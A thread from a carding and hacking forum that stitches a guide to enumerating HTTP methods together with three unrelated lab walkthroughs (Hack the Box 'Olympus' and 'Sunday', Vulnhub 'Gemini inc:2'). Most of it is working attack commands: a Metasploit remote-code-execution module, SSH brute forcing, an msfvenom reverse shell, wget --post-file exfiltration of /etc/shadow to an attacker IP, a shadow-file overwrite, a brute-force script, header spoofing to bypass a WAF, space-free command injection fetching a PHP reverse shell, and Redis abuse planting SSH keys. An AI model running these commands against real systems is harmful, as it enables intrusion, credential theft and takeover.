[Guide] Multiple Ways to Detect HTTP Options

[Guide] Multiple Ways to Detect HTTP Options - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] Multiple Ways to Detect HTTP Options (/Thread-Guide-Multiple-Ways-to-Detect-HTTP-Options)

[Guide] Multiple Ways to Detect HTTP Options - NINZA - 05-14-2020

Hi Friends, today we will walk through various HTTP Protocol methods and the tools used to extract those available HTTP methods in a web server. As we are already aware that the HTTP protocol comprises of a number of methods that can be utilized to not only gather the information from the web server but can also perform specific actions on the web server. These techniques and methods are helpful for the web application developers in the deployment and testing stage of web applications.
GET and POST is the most well-known methods that are used to access and submit information provided by a web server, respectively. HTTP Protocol allows various other methods as well, like PUT, CONNECT, TRACE, HEAD, DELETE. These methods can be used for malicious purposes if the web server is left misconfigured and hence poses a major security risk for the web application, as this could allow an attacker to modify the files stored on the web server.
OPTIONS: The OPTIONS method is used to request the available HTTP methods on a web server.
GET: GET request is the most common and widely used methods for the websites. This method is used to retrieve the data from the web server for a specific resource. As the GET method only requests for the data and doesn’t modify the content of any resources, it’s considered to be safe.
POST: POST requests are used to send (or submit) the data to the web server so as to create or update a resource. The information sent is stored in the request body of the HTTP request and processed further. An example illustrating the same is “Contact us” form page on a website. When we fill a form and submit it, the input data is then stored in the response body of the request and sent across to the server.
PUT: The PUT method allows the end-user (client) to upload new files on the web server. An attacker can exploit it by uploading malicious files or by using the victim’s server as a file repository.
CONNECT: The CONNECT method could allow a client to use the web server as a proxy.
TRACE: This method echoes back to the client, the same string which has been sent across to the server, and is used mainly for debugging purposes.
HEAD: The HEAD method is almost similar to GET, however without the message-body in the response. In other words, if the HTTP request GET /products return a list of products, then the HEAD /products will trigger a similar HTTP request, however, won’t retrieve the list of products.
DELETE: This method enables a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to perform a DoS attack.
Now let us use some tools to identify the HTTP methods enabled or supported by the web server
Metasploit
Metasploit Framework is a well-known platform for developing, testing, and executing exploits. It is an open source tool for performing various exploits against the target machines.
Metasploit has in-built auxiliary modules dedicated to scanning HTTP methods. Through the Metasploit framework command line (CLI), we can identify the HTTP Options available on the target URL as follows:
use auxiliary/scanner/http/options
set rhosts 192.168.1.109
set rport 80
exploit
1
2
3
4
use auxiliary/scanner/http/options
set rhosts 192.168.1.109
set rport 80
exploit
[Image: 1.png?w=687&ssl=1]

cURL
cURL is a command line tool to get or send the data using the URL syntax and is compatible with various well-known protocols (HTTPS, FTP, SCP, LDAP, Telnet etc.) along with command line (CLI) options for performing various tasks (Eg: User authentication , FTP uploading , SSL connections etc). The cURL utility by default comes installed in most of the distributions. However if in case, cURL is not installed, then we can install the same via apt-get install curl command. For more details refer the below URL

[To see content please register here]

Through the cURL command we can identify the HTTP Options available on the target URL as follows :
curl -v -X OPTIONS

[To see content please register here]

1
curl -v -X OPTIONS

[To see content please register here]

The screenshot displays the various types of allowed HTTP methods (GET, HEAD, POST, OPTIONS, TRACE), apart from other server-specific information (Server response, version details etc)
[Image: 2.png?w=687&ssl=1]

Nikto
Nikto is a Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software and other issues. It performs generic and server types of specific checks.
Through the Nikto command we can identify the HTTP Options available on the target URL as follows :
nikto -h 192.168.1.109
1
nikto -h 192.168.1.109
The screenshot displays the various types of allowed HTTP methods (GET, HEAD, POST, OPTIONS, TRACE), apart from another detailed server specific information (Server response, version details etc)
[Image: 3.png?w=687&ssl=1]

Nmap
Nmap is a free and open-source security scanner, used to discover hosts and services on the network. This is another method of checking which HTTP methods are enabled by using an NMAP script called http-methods.nse, which can be obtained from

[To see content please register here]

.
Let us use NMAP command to enumerate all of the HTTP methods supported by a web server on the target URL as follows :
nmap --script http-methods --script-args http-method.test-all ='/192.168.1.109' 192.168.1.109
1
nmap --script http-methods --script-args http-method.test-all ='/192.168.1.109' 192.168.1.109
The screenshot displays the various types of allowed HTTP methods (GET, HEAD, POST, OPTIONS, TRACE) along with highlighting the potential risk methods (i.e TRACE) out of them.
[Image: 4.png?w=687&ssl=1]

Netcat
Netcat is a utility tool having the capability to write and read data across TCP and UDP network connections, along with features like in-built port scanning, network debugging and file transfer etc.
Through the Netcat command we can identify the HTTP Options available on the target URL as follows :
nc 192.168.1.109 80
1
nc 192.168.1.109 80
Press enter and the following options appear in the command line. Enter the server details as follows (and as highlighted in red )
OPTIONS

[To see content please register here]

/ HTTP/1.0
host:192.168.1.109
1
2
OPTIONS

[To see content please register here]

/ HTTP/1.0
host:192.168.1.109
The screenshot displays the various types of allowed HTTP methods (GET, HEAD, POST, OPTIONS, TRACE), apart from other server-specific information (Server response, version details etc)
[Image: 5.png?w=687&ssl=1]

Burpsuite
Burp Suite is a platform for performing various security testing for web applications, from initial mapping and analysis to identifying and exploiting application vulnerabilities.
As we are aware that the HTTP OPTIONS method provides us with the most effective way to discover the different methods allowed on an HTTP server. So, let us capture the URL request in Burpsuite GUI and change the HTTP method type in the Request section to OPTIONS, as seen below.
As shown, the RESPONSE from the web server not only displays the list of HTTP methods allowed, however also highlights the server version details (Eg: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL 1.0.0/k DAV/2 PHP/5.4.3)
[Image: 6.png?w=687&ssl=1]

Today we are going to solve another CTF challenge “Olympus”. Olympus is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have static IP. The IP of Olympus is 10.10.10.83
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -A 10.10.10.83
1
nmap -A 10.10.10.83
[Image: 1.png?w=687&ssl=1]

From scanning through nmap, we found that here port 22 is filtered for SSH but instead of that port 2222 is also open for SSH. Moreover, port 53 is open for DNS where it has grabbed banner “Bind” and even it found the port 80 is opened for Apache http server. Therefore firstly, let’s navigate to port 80 in the web browser.
[Image: 2.png?w=687&ssl=1]

After exploring target IP in the web browser, we were welcomed by a Zeus picture as shown in the above image. Unfortunately! Here we are unable to find any remarkable clue, therefore we have decided to run Nikto for scanning possible vulnerabilities.
Let’s find the list of possible vulnerabilities using Nikto:
nikto -h

[To see content please register here]

1
nikto -h

[To see content please register here]

Scanning with Nikto gave us a clue to move forward which is Uncommon header ‘xdebug’. Searching the keyword ‘xdebug’ on google gave us a result about ‘xdebug’ command execution exploits module for Metasploit. After that load Metasploit on your terminal and use the commands as follows:
msf > use exploit/unix/http/xdebug_unauth_exec
msf (exploit/unix/http/xdebug_unauth_exec) > set rhost 10.10.10.83
msf (exploit/unix/http/xdebug_unauth_exec) > set lhost 10.10.14.13
msf (exploit/unix/http/xdebug_unauth_exec) > exploit
1
2
3
4
msf > use exploit/unix/http/xdebug_unauth_exec
msf (exploit/unix/http/xdebug_unauth_exec) > set rhost 10.10.10.83
msf (exploit/unix/http/xdebug_unauth_exec) > set lhost 10.10.14.13
msf (exploit/unix/http/xdebug_unauth_exec) > exploit
Boom!! We have got the meterpreter of the target machine. Then further exploring directories, we noticed a directory /zeus which got a subdirectory /airgeddon. As you can relate it with the image below.
[Image: 4.png?w=687&ssl=1]

Then inside the /airgeddon directory, we opened its subdirectory /captured which shows a file captured.cap.

ls
cd /home
ls
cd zeus
ls
1
2
3
4
5
ls
cd /home
ls
cd zeus
ls
It could be another clue, therefore we downloaded this file on our Kali Desktop as you can see in the image below.
cd airgeddon
ls
cat pindb_checksum.txt
cd captured
ls
download captured.cap /root/Desktop/
cat papyrus.txt
1
2
3
4
5
6
7
cd airgeddon
ls
cat pindb_checksum.txt
cd captured
ls
download captured.cap /root/Desktop/
cat papyrus.txt
[Image: 5.png?w=687&ssl=1]

After downloading capture.cap file, we need to analyze it. So when we open this file, it was a Wireshark pcap file and by streaming the 1st packet we noticed SSID: Too_clOse_to_th3_Sun as shown in the image. This can be probably used as a Password.
[Image: 6.png?w=687&ssl=1]

Now cracking the file captured.cap using aircrack following command:
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
1
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
After a few minutes, we have found the key: flightoficarus as shown in the image below.
[Image: 8.png?w=687&ssl=1]

We thought icarus could be a username too. Because earlier when we search “Too close to the Sun” in the Google, it shows the wiki page of icarus. Therefore the following combination of credentials can be used for SSH login via port 2222.
icarus:Too_clOse_to_th3_Sun
ssh [email protected] -p 2222
1
2
icarus:Too_clOse_to_th3_Sun
ssh [email protected] -p 2222
After successfully logging into SSH on navigating further, we acquired a file “help_of_the_gods.txt”. After reading the file it shows us a domain name ctfolympus.htb as shown in the image below.
[Image: 9.png?w=687&ssl=1]

We thought of trying DNS zone transfer since dig uses the axfr response to retrieve your zone information.
dig axfr @10.10.10.83 ctfolympus.htb
1
dig axfr @10.10.10.83 ctfolympus.htb
From the result, we figured that pormetheus can be another username and St34l_th3_F1re! could be the possible password. Also, there is a series of some random port numbers 3456 8234 62431 and this brings us to ponder on port Knocking that can change the state of SSH port 22 from filtered to open.
[Image: 11.png?w=687&ssl=1]

We knocked these ports by executing the following command:
knock -v 10.10.10.83 3456 8234 62431
1
knock -v 10.10.10.83 3456 8234 62431
After knocking these ports just to confirm the state of SSH port 22 by using nmap scan. Here we succeeded in making the SSH port open.
nmap -p22 10.10.10.83
1
nmap -p22 10.10.10.83
[Image: 13.png?w=687&ssl=1]

Now by logging into SSH port 22 by using the given below credentials:
Prometheus: St34l_th3_F1re!
1
Prometheus: St34l_th3_F1re!
Here!! We have found and read user.txt.
Yuppie!! We have completed our first task, moving on towards the second task.
[Image: 14.png?w=687&ssl=1]

Then using id command, it came into notice that prometheus is in docker users group. Let’s have a look at docker images and docker ps as shown in the image below.
docker image
docker ps
1
2
docker image
docker ps
[Image: 16.png?w=687&ssl=1]

By executing the above command we notice there is a docker_image “olympia” hence we can create a copy of a bash with the following command to escalate root privileges:
Time to get root.txt!!
After looking for some information on how to exploit this, we find that we can access it as root by using the following command:
docker run -v /:/root -i -t olympia /bin/bash
1
docker run -v /:/root -i -t olympia /bin/bash
Booyah!! We have found root.txt and from the image below you can see we have obtained the value of root.txt.
[Image: 17.png?w=687&ssl=1]

Hello friends!! Today we are going to solve another CTF challenge “Sunday. Sunday is a retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: find user.txt and root.txt file in the victim’s machine.
Penetration Methodology
Scanning

Open ports and Running services (Nmap)

Enumeration

Identify finger users (Metasploit)

Exploit

SSH Brute force
Access shell using SSH

Privilege Escalation

Method 1
Method 2
Method 3
Capture root.txt flag

Walk-through
Scanning
Since these labs are online available therefore they have static IP. The IP of Sunday is 10.10.10.76
Let’s start off with scanning the network to find our target.
nmap -p- -A 10.10.10.76 --open
1
nmap -p- -A 10.10.10.76 --open
[Image: 1.png?w=687&ssl=1]

Enumeration
So here, we notice very interesting result from nmap scan, here it shown port 79 is open for Sun Solaris fingered. So I Googled for its exploit and found Metasploit exploit “Finger Service User Enumerator”.
Then I load Metasploit framework for Identify valid users through the finger service using a variety of tricks and therefore, use the following module.
use auxiliary/scanner/finger/finger_users
msf auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76
msf auxiliary(scanner/finger/finger_users) > set users_file /root/pentest/SecLists/Usernames/Names/names.txt
msf auxiliary(scanner/finger/finger_users) > exploit
1
2
3
4
use auxiliary/scanner/finger/finger_users
msf auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76
msf auxiliary(scanner/finger/finger_users) > set users_file /root/pentest/SecLists/Usernames/Names/names.txt
msf auxiliary(scanner/finger/finger_users) > exploit
[Image: 2.png?w=687&ssl=1]

Exploit
So, basically it reviled so many usernames which it has found, now make a dictionary of the obtain username and password that will be helpful in SSH login brute force.
Here we have used “patator” for SSH login to launch brute force on port 22022 and execute the following command.
patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=probable-v2-top1575.txt persistent=0
1
patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=probable-v2-top1575.txt persistent=0
Finally, we found the following the password of the user “sunny”.
Password: sunday
[Image: 4.png?w=687&ssl=1]

But when we try to login into ssh by using above credential, it gave “no matching key exchange method found” error and also put some hint and drop the connection request.
[Image: 5.png?w=687&ssl=1]

Then with little more research, I edit the following key to connect SSH and luckily obtain tty shell access.
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p22022
sudo -l
1
2
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p22022
sudo -l
Then I check sudo right for user sunny and notice he can run /root/troll as root without a password.
Lol!! Executing /root/troll was a troll. Further, I check the list for available list and directories, luckily I found shadow.backup inside the /backup directory.
Inside shadow.backup, I found hashes for users Sammy and Sunny.
[Image: 6.png?w=687&ssl=1]

So we try to crack these hashes by using john the ripper and fortunately obtained the password in plaintext format “cooldude!” of user sammy.
[Image: 7.png?w=687&ssl=1]

Privilege Escalation Techniques
There are multiple ways to escalated root privilege in this lab, in this article, we have applied 4-ways to escalated root privilege to get the root.txt file.
Now let’s switch from Sunny to Sammy and figure-out assigned sudo permission for him.
sudo -l
1
sudo -l
Great!! We found that he has the right to download any file as root by using wget command. Now let’s also enumerate system binaries having enabled SUID bit.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
There so many binary files having SUID bit enabled, let’s exploit some of them to gain root privilege.
[Image: 8.png?w=687&ssl=1]

Method 1
Now let’s generate a payload using msfvenom, thus you can execute the following command and run php server to transfer this file.
msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf > /root/Desktop/raj.elf
php -S 0.0.0.0:80
1
2
msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf > /root/Desktop/raj.elf
php -S 0.0.0.0:80
[Image: 9.png?w=687&ssl=1]

Let’s download above raj.elf through wget inside /tmp directory and replace it from rsh binary. Then start netcat listen in a new terminal to spawn tty shell of root privilege.
cd /tmp
sudo /usr/bin/wget 10.10.14.6/raj.elf -O /usr/bin/rsh
/usr/bin/rsh
1
2
3
cd /tmp
sudo /usr/bin/wget 10.10.14.6/raj.elf -O /usr/bin/rsh
/usr/bin/rsh
[Image: 10.png?w=687&ssl=1]

Now when you will execute /usr/bin/rsh command, you get root privilege shell access as shown below in the image.
id
1
id
And as you can observe the euid=0 for root, therefore, now let’s grab the root.txt file.
cd /root
ls
cat root.txt
1
2
3
cd /root
ls
cat root.txt
[Image: 11.png?w=687&ssl=1]

Method 2
The pfexec program is used to execute commands with the attributes specified by the user’s profiles in the exec_attr(4) database. It is invoked by the profile shells, pfsh, pfcsh, and pfksh which are linked to the Bourne shell, C shell, and Korn shell, respectively.
From

[To see content please register here]

Now execute the following command to obtain root privilege shell.
pfexec bash
id
cd /root
ls
cat root.txt
1
2
3
4
5
pfexec bash
id
cd /root
ls
cat root.txt
So, in this lab challenge, we obtain root.txt file through four types of privilege escalation and there might be other ways also available to get the root.txt file. Try it yourself!!
Happy Hacking
[Image: 17.png?w=687&ssl=1]

Method 3
As we know that the sudo permission is available for the wget, thus we can use post-file option method to send the contents of any file for example /etc/password or /etc/shadow files.
[Image: 18.png?w=687&ssl=1]

Therefore we execute the following command to post shadow file content on our local listening machine.
sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.6
1
sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.6
[Image: 19.png?w=687&ssl=1]

And in the terminal where netcat listener is activated, you will get the content of shadow file.
nc -lvp 80
1
nc -lvp 80
From the given image, you can observe that we have obtained the hash value of the root user. Either you can crack the hash value or can modify it.
[Image: 21.png?w=687&ssl=1]

So we have copied the above content in a text file and so that we can replace the hash value of user: root from the hash value of user: sunny.
[Image: 22.png?w=687&ssl=1]

In the given below image, you can observe that we have modified the root hash value by copying user sunny hashes, as we know that the password of sunny is “sunday”. Hence the new password for root will be sunday, now named the file as shadow and ready to transfer it.
[Image: 23.png?w=687&ssl=1]

Now download the above-modified shadow file in its original path i.e. /etc/shadow, so that it will overwrite the original shadow file.
sudo /usr/bin/wget 10.10.14.6/shadow -O /etc/shadow
1
sudo /usr/bin/wget 10.10.14.6/shadow -O /etc/shadow
[Image: 24.png?w=687&ssl=1]

Method 4
Similarly, we can also post the content of the root.txt file directly to the listening machine.
sudo /usr/bin/wget --post-file=/root/root.txt 10.10.14.6
1
sudo /usr/bin/wget --post-file=/root/root.txt 10.10.14.6
[Image: 25.png?w=687&ssl=1]

And in the terminal where netcat listener is activated, you will content of the root.txt file which is root flag.
nc -lvp 80
1
nc -lvp 80
From the given image, you can observe that we have obtained the value of the root.txt.
[Image: 26.png?w=687&ssl=1]

Hello Friends!! Today we are going to breach a new VM lab “Gemini inc:2” of the vulnhub series and before moving ahead you can also take a look over

[To see content please register here]

which we had solved earlier.
Gemini Inc has contacted you to perform a penetration testing on one of their internal systems. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege. To demonstrate the level of access obtained, please provide the content of flag.txt located in the root directory as proof.
You can download it from here:

[To see content please register here]

Penetration Methodologies:

Network Scanning (Netdiscover, Nmap)
Obtaining Activation Code (Bash script)
Web Directory Enumeration (Dirb)
Bypass WAF (Burp Suite)
Exploit Remote Code Execution
Upload Reverse_ shell
Obtain Reverse connection (Netcat)
Abusing Redis for privilege escalation
Capture the flag

WalkThrough
The first step is as always, running netdiscover on the VM to grab the IP address. In my case, the IP was 192.168.1.103
[Image: 1.png?w=687&ssl=1]

Once the IP was found, we ran nmap aggressive scan to enumerate all the open ports.
nmap –A 192.168.1.103
1
nmap –A 192.168.1.103
[Image: 2.png?w=687&ssl=1]

From the nmap scan result, we found port 80 is open for HTTP service, let’s navigate to port 80 in the browser. It put up the Welcome Guest page for login into the web application.
[Image: 3.png?w=687&ssl=1]

When we didn’t find any remarkable clue from its home page, then without wasting much time, I use dirb for web directory enumeration and ran the following command for .php extension related files:
dirb

[To see content please register here]

-X .php
1
dirb

[To see content please register here]

-X .php
Hmmm! I fetched some interesting URL, let’s inspect each one-by-one.
[Image: 4.png?w=687&ssl=1]

So further, we navigate to URL:

[To see content please register here]

and here observe the Activation Form that requires a User ID and Activation Code to activate the account.
[Image: 5.png?w=687&ssl=1]

Next, we navigate to URL:

[To see content please register here]

and here observe the Register Form to register a new account. So I registered for an account as “raaj”.
[Image: 6.png?w=687&ssl=1]

By registering as raaj, a new profile has been generated with User ID-14 as highlighted in the below image but still, we need the 6-digit activation code to activate the user “raaj” account.
To obtain an activation code, I try all possible Hit-Try method but all were a proof waste and at last, I found this

[To see content please register here]

where I found a bash script for the activation code.
[Image: 7.png?w=687&ssl=1]

I copied the following code in a text file and save as gemini.sh on the Desktop. Script Source

[To see content please register here]

#!/bin/bash
url="http://192.168.1.103/activate.php"
for key in {000000..999999}; do
token=$(curl -s -c cookie $url | awk -F 'value=' '/token/ {print $2}' | cut -d "'" -f2)
resp=$(curl -s -w %{http_code} -b cookie --data "userid=14&activation_code=$key&token=${token}" $url | tail -n 1 | cut -d ">" -f2)
if [ $resp -ne 403 ]; then
echo "Key = "$key
break
fi
done
1
2
3
4
5
6
7
8
9
10
#!/bin/bash
url="http://192.168.1.103/activate.php"
for key in {000000..999999}; do
token=$(curl -s -c cookie $url | awk -F 'value=' '/token/ {print $2}' | cut -d "'" -f2)
resp=$(curl -s -w %{http_code} -b cookie --data "userid=14&activation_code=$key&token=${token}" $url | tail -n 1 | cut -d ">" -f2)
if [ $resp -ne 403 ]; then
echo "Key = "$key
break
fi
done
And at last, ran the bash script through the following command with user_id “14” to obtain the 6-digit activation code for user “raaj”.
bash gemini.sh
1
bash gemini.sh
Awesome!! So we cracked the activation code “000511” for user “raaj”
[Image: 4.png?w=687&ssl=1]

Now, submit your User_id and activated code to activate the account. In my case, my user_id is 14 and the activation code is 000511 for user “raaj”.
[Image: 8.png?w=687&ssl=1]

Great, I got login of raaj and then further I explored User List where I found all activated account of other users.
[Image: 9.png?w=687&ssl=1]

Then I check the profile of 9emin1 which was actually named as Gemini and here I found it is an administrator account.
[Image: 10.png?w=687&ssl=1]

Then I check its source code where luckily I found the password hashes. I copied the hash value for its decryption.
[Image: 11.png?w=687&ssl=1]

Then I use the online MD5 decryption for decrypting the hash value ‘edbd1887e772e13c251f688a5f10c1ffbb67960d’ and finally we obtain the plain text password “secretpassword”.
[Image: 12.png?w=687&ssl=1]

Then we login into the admin panel with the following credential:
Username: Gemini
Password: secretpassword
1
2
Username: Gemini
Password: secretpassword
Then navigate to Admin Panel -> Execute Command. But it shows nothing.
[Image: 15.png?w=687&ssl=1]

At that moment I used Burp suit for intercepting Http request and then further sent the intercepted request into a repeater to assured what kind of Response it is generating.
Here I look at the HTTP traffic and perceive a 403 IP NOT ALLOWED response. Hence proved the web application is running behind some kind of firewall.
[Image: 16.png?w=687&ssl=1]

Then I Google to bypass WAF through burp suite extension and found a

[To see content please register here]

for “Bypass WAF”
This extension adds headers to all Burp requests to bypass some WAF products. The following headers are automatically added to all requests:

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

In our case, I use “X-Forwarded-For: 127.0.0.1” and then forward the intercepted HTTP request.
[Image: 18.png?w=687&ssl=1]

Execute Command
Finally, we got the Execute Command page, and it appears to be vulnerable to RCE where we can run system arbitrary command. Therefore, we try some malicious code such as “;ls” but again it’s shows nothing.
[Image: 19.png?w=687&ssl=1]

Here we need to fix X-Forwarded-For: 127.0.0.1 header for each page and to do so follow the below steps:

Intercept the HTTP request of Execute Command page and go to Options.
Explore Match and Replace setting then click to edit option to modify the request header.
A small window will pop-up for Edit match/replace rule, here paste “X-Forwarded-For: 127.0.0.1” in the replace text field.
Click on Ok and forward the intercepted request.

Now, we can easily exploit RCE vulnerability by uploading our php-reverse-shell. Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php; here I had modified the IP: 192.168.1.106 [kali IP] and listen port as 1234.
[Image: 21.png?w=687&ssl=1]

Hey Guys!! You need to pay Attention here:
NOTE: Be careful while executing any command that contains some arguments because here it is executing the command with argument and without spaces. So once again I took the help from Google and found a

[To see content please register here]

for sending command with argument and without spaces.
IFS=:;a=wget:192.168.1.106/revshell.php:-O/tmp/revshell.php;$a
1
IFS=:;a=wget:192.168.1.106/revshell.php:-O/tmp/revshell.php;$a
[Image: 22.png?w=687&ssl=1]

Now type the following command to execute the uploaded backdoor file but before executing following command do not forget to start netcat listener.
IFS=:;a=php:/tmp/revshell.php;$a
1
IFS=:;a=php:/tmp/revshell.php;$a
[Image: 23.png?w=687&ssl=1]

nc –lvp 1234
1
nc –lvp 1234
Now, execute the following command to spawn proper tty shell of the target machine.
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a
uname -a
1
2
3
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a
uname -a
[Image: 24.png?w=687&ssl=1]

Now, let’s go for the post-exploitation to obtain the root.txt file and for that, we need to escalated root privilege. First, we traverse to /home directory but didn’t find any valuable file, therefore, we try to enumerate running services with help of the following command.
netstat -antp
1
netstat -antp
By executing the above command we enumerated the running services and found port 6379 is used for Redis. And as we knew Redis is a key-value store, often referred to as a NoSQL database. The essence of a key-value store is the ability to store some data, called a value, inside a key. This data can later be retrieved only if we know the exact key used to store it.
From source:

[To see content please register here]

Therefore, from its configuration file, we retrieved the auth key “8a7b86a2cd89d96dfcc125ebcc0535e6” so that we can extract information.
cd /etc/redis
ls
cat 6379.conf | grep requirepass
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 ping
1
2
3
4
cd /etc/redis
ls
cat 6379.conf | grep requirepass
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 ping
Great!! So we got pong response, now let move ahead for extracting information inside it.
[Image: 25.png?w=687&ssl=1]

Abusing Redis by writing malicious RSA keypair to the disk and for that, you can follow the given below steps and execute the command as described in the below steps.

Generate a malicious RSA keypair with help of keygen.

ssh-keygen
1
ssh-keygen

Prepare the public key by adding newlines with the help of the following command

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > public.txt
1
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > public.txt

Load the malicious public key into redis

cat public.txt | redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 -x set pub
1
cat public.txt | redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 -x set pub

Set path to dump the content with the help of the following command

redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dir "/root/.ssh/"
1
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dir "/root/.ssh/"

Configure the dbfilename as authorized_keys

redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dbfilename authorized_keys
1
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dbfilename authorized_keys

Save the configuration and exit.

redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 save
1
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 save
[Image: 26.png?w=687&ssl=1]

Authenticate via SSH.
cd .ssh
ssh [email protected]
1
2
cd .ssh
ssh [email protected]
Boom!!! We got root access now let’s grab the flag.txt file to finish this challenge completely.
ls
cat flag.txt
1
2
ls
cat flag.txt
Yuppie!!! Happy Hacking ?
[Image: 27.png?w=687&ssl=1]